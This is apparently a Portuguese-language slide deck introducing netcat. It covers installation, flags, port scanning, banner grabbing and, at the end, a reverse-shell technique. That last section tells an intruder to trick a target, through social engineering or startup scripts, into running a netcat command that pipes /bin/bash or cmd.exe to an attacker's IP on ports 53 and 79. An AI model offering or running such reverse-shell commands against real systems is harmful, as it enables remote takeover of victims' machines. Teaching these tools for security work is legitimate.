netcat
DESCRIPTION
NetCatTRANSCRIPT
O que é?
� Canivete suíço � cheio de acessórios
� NetCat ou apenas nc, é o canivete suíço do TCP/IP
� Pode ser usado para trojan, port scan, brute force, etcetc
� Nada mal para quem surgiu como um Telnet melhorado
Para que serve?
� Diversas possibilidades
� O que impressiona é o tamanho do programa (muito pequeno) pelo seu potencial
� Nc permite manipular conexões TCP/IP para � Nc permite manipular conexões TCP/IP para alcançarmos alguns objetivos
Obtendo
� Instalado nas distribuições Linux mais conhecidas
� Pode obter com apt-get install netcat
� Digite nc ou netcat no console. Se aparecer Cmd line é que está instaladoline é que está instalado
� Existe a versão para Windows também
� Descompactar os arquivos em qualquer pasta
Funcionamento
� Semelhante as outras ferramentas de console (linha de comando)
� Digitar nome do programa, seguido dos parâmetros, do IP e talvez as portas desejadasparâmetros, do IP e talvez as portas desejadas
� Exemplo de varredura port scan de 1 a 100
� Duas formas
� nc –vv 192.168.0.1 1-100 (comando direto)
� nc� E depois os parâmetros no Cmd line
� –vv 192.168.0.1 1-100
Parâmetros
� Ajuda
� nc –h
� -l: coloca uma porta em estado de escuta (listen)
� -L: coloca porta em escuta mas reabre caso ela feche
� -p XX: define uma porta� -p XX: define uma porta
� -v ou –vv: ativa o echo (verbose)
� -u: usa UDP ao invés de TCP
� -t: conexão por Telnet
� -w XX: determina tempo máximo em segundos para aguardar resposta
� -e: redireciona arquivos
� -d: coloca o nc em modo furtivo, ou seja, oculto e carregado na memória
Na Prática
� Veremos alguns exemplos
� É importante que entenda e pratique
� Desta forma, poderá adaptar os exemplos as suas necessidadesnecessidades
NetCat como Telnet
� O que é?
� Telnet é um protocolo/programa que permite a ligação de um computador a outro
� Na prática, quer dizer acesso remoto a outro computador, esteja na rede local ou na INternet
� Telnet é conhecimento imprescindível, tanto para invasores como para profissionais de segurança
� Como fazer isso com o nc?
� Basta informar o endereço do host e a porta de conexão. Porta padrão do Telnet é 23.
� nc 192.168.0.1 23
NetCat como PortScan
� O que é?
� Port Scan é a técnica de buscar no host quais portas e serviços estão ativos
� Como fazer isso com o nc?� Como fazer isso com o nc?
� nc -vv 127.0.0.1 1-100
� nc -vv 127.0.0.1 23 21 80 110
NetCat como Sniffer
� O que é?
� Sniffer é a técnica de captura de pacotes da rede
� Imagine você enviando um e-mail num cybercafe e alguém na outra máquina recebendo a mensagem e a senha do seu provedor
� Como fazer isso com o nc?
� nc -vv -L 127.0.0.1 -p 80 > log.txt
� Para ver o resultado, abra o arquivo no bloco de notas ou usando vi ou type
NetCat como FingerPrint
� O que é?
� Fingerprint é impressão digital
� Uso do nc para saber qual o SO que está rodando num servidor web
� Como fazer isso com o nc?
� nc www.dominio.com.br 80
� Depois digite� get ./
� Receberá cabeçalho do alvo
Net Cat com Conexão Reversa
� O que é?
� A idéia é simples. Se não podemos nos conectar no alvo por causa de restrições de firewalls, então vamos fazer o usuário conectar a nós
� Sabemos que firewall é mais rigoroso com conexões de entrada. Então podemos usar as portas 53 e 79, pois são usadas em consultas DNS e finger.
� Como fazer isso com o nc?� Como fazer isso com o nc?
� Técnica que depende da colaboração do alvo, seja de forma ativa ou passiva. Trabalho de engenharia social. Uso de .bat, tarefas, inicializador, etc
� Na máquina do invasor, digitar
� nc -l -n -vv -p 53
� nc -l -n -vv -p 79
� Na máquina do alvo, ele deverá digitar
� Se alvo em Linux
� nc IP_Invasor 53 | /bin/bash | nc IP_invasor 79
� Se alvo em Windows
� nc IP_Invasor 53 | cmd.exe | nc IP_invasor 79